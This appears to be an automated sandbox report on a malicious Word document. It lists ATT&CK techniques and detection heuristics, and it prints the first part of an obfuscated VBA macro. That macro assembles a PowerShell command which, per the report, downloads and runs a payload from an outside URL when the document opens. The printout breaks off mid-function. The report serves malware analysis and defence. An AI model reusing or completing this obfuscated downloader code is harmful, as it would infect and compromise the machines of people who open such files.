Verdict: MALICIOUS (Risk Score 142)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly indicative of malicious intent. The script attempts to construct and execute a PowerShell command to download and execute a payload from the URL 'http://7KnMct8tT6uAZ7el'. This suggests downloader or dropper functionality.
Heuristics (5)
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://7KnMct8tT6uAZ7el: in document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 132538 bytes |

SHA-256: b7e68ca7e0fb05bca35e4c1c186de7361f494c3391b85dfe0635befebece0c0c
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "VUzSrsNCHPl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function XwQBkLB()
On Error Resume Next
kmHzHavq = (cofOzZDzBo - CDbl(838864) + VEaEsVmjqG + Fix(AzdZfb / CLng(962874 * Sqr(jXDpk))) - 988518 / Sin(WkijOC - ovVBjM - 605079 + CLng(FlnMz)) * 439263 * Fix(838864))
ACAGNj = "sUef7s4taw21FWhckowershell iR3"
BzBzp = CStr(Left(Right(ACAGNj, 13), 10))
XPqHhHfl = "sUef7s4taw21FWhckHwM9vhWUDciR3kcyKt . ( ([StrInG]$veRBOwn8At"
huOufzB = Left(Right(XPqHhHfl, 25), 20)
waGhQJLY = "sUef7s4taw21FWhckSePrEFereniR3"
KFrzw = CStr(Left(Right(waGhQJLY, 13), 10))
WmuRqn = "kxICy3nFCe)[1,3]V2xDBE5s"
HdkFlHsGK = CStr(Left(Right(WmuRqn, 16), 8))
KztumjtYn = Chr(43)
kkfIpAzErS = "ICy3nFjZGuruoVV2xDBE5'X'-jOiN'')(((' iNlE30wXCGc8pEiNvrQQ"
PsPCnUtFi = Left(Right(kkfIpAzErS, 36), 18) + Left(Right(kkfIpAzErS, 4), 1)
bLSKMPO = (hRRNmY - CDbl(996143) + YwAQuPWz + Fix(FHnIfS / CLng(555884 * Sqr(OmqGZo))) - 996442 / Sin(nNlJf - vUpDLLlfq - 460025 + CLng(AFNFEF)) * 254443 * Fix(996143))
LlVIYb = "ICy3nFjZGuruoVV2xDBEokE-eXpReSsioN ((7elE30wXCGc8p(iNW"
TIRsJMzjiI = CStr(Left(Right(LlVIYb, 34), 17)) + Left(Right(LlVIYb, 4), 1)
mrvoSCF = "kxICy3nF7KnOS7KnV2xDBE5s"
CXMzfzW = CStr(Left(Right(mrvoSCF, 16), 8))
CdFvrsTRS = Chr(43)
ZQtqtBP = "kxICy3n7Knl7KnoVV2xDB"
qFXUBEPww = Left(Right(ZQtqtBP, 14), 7)
CijMREmwjb = Chr(43)
kFhLRtKDDk = "kxICy3nFjZGuru7Knnsadasd7Kn9TMct8tT6uAZ"
jwXSHONZ = Left(Right(kFhLRtKDDk, 25), 13)
quiFoDshWHk = Chr(43)
tPhzAtpqqn = "kx7'y3"
BkiXztdmF = CStr(Left(Right(tPhzAtpqqn, 4), 2))
iqBJHAB = Chr(43)
vJVjmtVLnDf = (sfcRhJEoWYW - CDbl(472191) + PaAsHzF + Fix(sGGjUSlCZ / CLng(936445 * Sqr(LXsSTZzJJna))) - 914215 / Sin(XXnzULtd - owACl - 157332 + CLng(tzPXBOZM)) * 992549 * Fix(472191))
iSBTXS = "kxICy3nFjZGu'Kn = &(7Knsmxt9TMct8"
zPUEzPhpB = CStr(Left(Right(iSBTXS, 21), 11))
RUMcDOu = Chr(43)
MkqBl = "kxICy3n7KnA7KnoVV2xDB"
HlpinVD = Left(Right(MkqBl, 14), 7)
rrkZRTlu = Chr(43)
BiOzVUkj = "kxICy3nFjZGu7KnosnAo7Knsmxt9TMct8"
MwMqMKm = CStr(Left(Right(BiOzVUkj, 21), 11))
pdzYPwjWJth = Chr(43)
stIZFw = "kxICy3n7Kns7KnoVV2xDB"
UcwAWYpEbww = Left(Right(stIZFw, 14), 7)
RIrRiiuaC = Chr(43)
Sdwrrf = "kxI7KnnFj"
zsGCbuECI = CStr(Left(Right(Sdwrrf, 6), 3))
EzwkzLTo = Chr(43)
wvzYqZd = (JHUWLGF - CDbl(820142) + GHNswUp + Fix(OdazHJFrRz / CLng(597982 * Sqr(ZizAFkozzu))) - 279597 / Sin(TsBXiXt - XbFJK - 118178 + CLng(wfKABc)) * 135228 * Fix(820142))
KYIYj = "kxICy3nFAoseAos'V2xDBE5s"
mFApkKhZ = CStr(Left(Right(KYIYj, 16), 8))
TsLjX = Chr(43)
TnMcnZuw = "k'I"
bpVbici = Left(Right(TnMcnZuw, 2), 1)
fwjcLizZVF = Chr(43)
HfZbj = "k'I"
tEXULaKKbzp = Left(Right(HfZbj, 2), 1)
Tptzjjq = Chr(43)
ATRGop = (QnRfPsiRC - CDbl(361460) + lCdKsoPYFS + Fix(kLjvNX / CLng(407725 * Sqr(UiwifJkuDP))) - 825374 / Sin(BsnfoYAszH - BiiXVfbij - 21105 + CLng(VozYs)) * 651364 * Fix(361460))
trSwaJmiOV = "kxICy'A7KnGuruo"
EDtvTrTJfc = CStr(Left(Right(trSwaJmiOV, 10), 5))
kQUVj = Chr(43)
XcjjTp = "kxICy3n7Kno7K'oVV2xDB"
UpDLFGP = Left(Right(XcjjTp, 14), 7)
HGBRGO = Chr(43)
UJkYfMrkAMY = "kx'ny3"
TtRfFltiul = CStr(Left(Right(UJkYfMrkAMY, 4), 2))
LnhEGaFF = Chr(43)
Tiptdsd = "kxICy3nFjZGuruoV7Knsw-objecA7Knt8tT6uAZ7elE30"
wGbwzdiLk = CStr(Left(Right(Tiptdsd, 29), 15))
rYNKQWD = Chr(43)
ZDkmOXazFmu = "kxICy7KnosGuruo"
ifaKIZducf = CStr(Left(Right(ZDkmOXazFmu, 10), 5))
XwQBkLB = BzBzp + huOufzB + KFrzw + HdkFlHsGK + KztumjtYn + PsPCnUtFi + TIRsJMzjiI + CXMzfzW + CdFvrsTRS + qFXUBEPww + CijMREmwjb + jwXSHONZ + quiFoDshWHk + BkiXztdmF + iqBJHAB + zPUEzPhpB + RUMcDOu + HlpinVD + rrkZRTlu + MwMqMKm + pdzYPwjWJth + UcwAWYpEbww + RIrRiiuaC + zsGCbuECI + EzwkzLTo + mFApkKhZ + TsLjX + bpVbici + fwjcLizZVF + tEXULaKKbzp + Tptzjjq + EDtvTrTJfc + kQUVj + UpDLFGP + HGBRGO + TtRfFltiul + LnhEGaFF + wGbwzdiLk + rYNKQWD + ifaKIZducf
End Function
Functi
... (truncated)